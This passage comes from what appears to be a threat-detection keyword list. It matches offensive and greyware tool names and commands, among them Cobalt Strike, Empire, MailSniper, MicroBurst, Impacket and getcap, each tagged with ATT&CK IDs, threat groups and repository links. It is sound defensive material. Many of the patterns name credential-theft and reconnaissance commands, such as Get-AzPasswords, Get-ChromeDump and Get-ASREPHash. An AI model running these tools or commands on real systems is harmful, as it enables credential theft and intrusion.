proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*Get_WinPwn_Repo.sh*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Get-AccessTokenWithPRT*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Get-AclModificationRights*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Get-ActiveTCPConnections*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - 
Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Start-MonitorTCPConnections.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ADComputer * -Properties PrincipalsAllowedToDelegateToAccount*,offensive_tool_keyword,powershell,Command to get the list of accounts with PrincipalsAllowedToDelegateToAccount (used to exploit Bronze Bit Attack),T1003 - T1057 - T1087 - T1482 - T1136,TA0001 - TA0002 - TA0005 - TA0006 - TA0008,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-ADUsernameFromEWS*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*GetADUsers.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*getAggressorClient*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*getAllUserSpns*,offensive_tool_keyword,ldapdomaindump,Active Directory information dumper via LDAP,T1087 - T1005 - T1016,TA0007,N/A,N/A,Credential Access,https://github.com/dirkjanm/ldapdomaindump,1,1,N/A,N/A,10,970,176,2023-09-06T05:50:30Z,2016-05-24T18:46:56Z -*Get-AppLockerPolicy -Effective 
*,greyware_tool_keyword,powershell,AppLocker Get AppLocker policy,T1592,TA0043,N/A,N/A,Reconnaissance,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Get-ASREPHash*,offensive_tool_keyword,AD exploitation cheat sheet,AS-REP roasting Get the hash for a roastable user using ASREPRoast.ps1,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-AzAutomationAccountCredsREST.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzDomainInfo*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzDomainInfoREST.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzKeyVaultKeysREST.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzKeyVaultSecretsREST.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation 
tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzPasswords*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AZStorageKeysREST.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzureADDomainInfo*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzureADDomainInfo.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzurePasswords*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-AzUserAssignedIdentity*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Get-BaseLineResponseTimeEAS*,offensive_tool_keyword,MailSniper,MailSniper is a 
penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Get-BeaconAPI*,offensive_tool_keyword,cobaltstrike,Load any Beacon Object File using Powershell!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/airbus-cert/Invoke-Bof,1,1,N/A,10,10,232,32,2021-12-09T15:10:41Z,2021-12-09T15:09:22Z -*GetBearerToken.exe https://*.sharepoint.com*,offensive_tool_keyword,SnaffPoint,A tool for pointesters to find candies in SharePoint,T1210.001 - T1087.002 - T1059.006,TA0007 - TA0002 - 
TA0006,N/A,N/A,Discovery,https://github.com/nheiniger/SnaffPoint,1,0,N/A,7,2,191,19,2022-11-04T13:26:24Z,2022-08-25T13:16:06Z -*Get-BloodHoundData*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SPN.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-BootKey*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-BrowserData.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1153,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-BrowserInformation*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*GetC2Server*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*Get-CachedGPPPassword*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-CachedRDPConnection*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Get-CachedRDPConnection*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*getcap -r / 2>*,greyware_tool_keyword,getcap,recursively scans all the files starting from the root directory / and lists files with capabilities set,T1082 - T1007,TA0007 - TA0009,N/A,N/A,discovery,N/A,1,0,N/A,6,8,N/A,N/A,N/A,N/A -*getcap -r / 2>/dev/null*,greyware_tool_keyword,Getcap,Enumerating File Capabilities with Getcap,T1046 - T1083,TA0007,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*Get-ChromeBookmarks*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ChromeDump*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ChromeDump*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1150,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 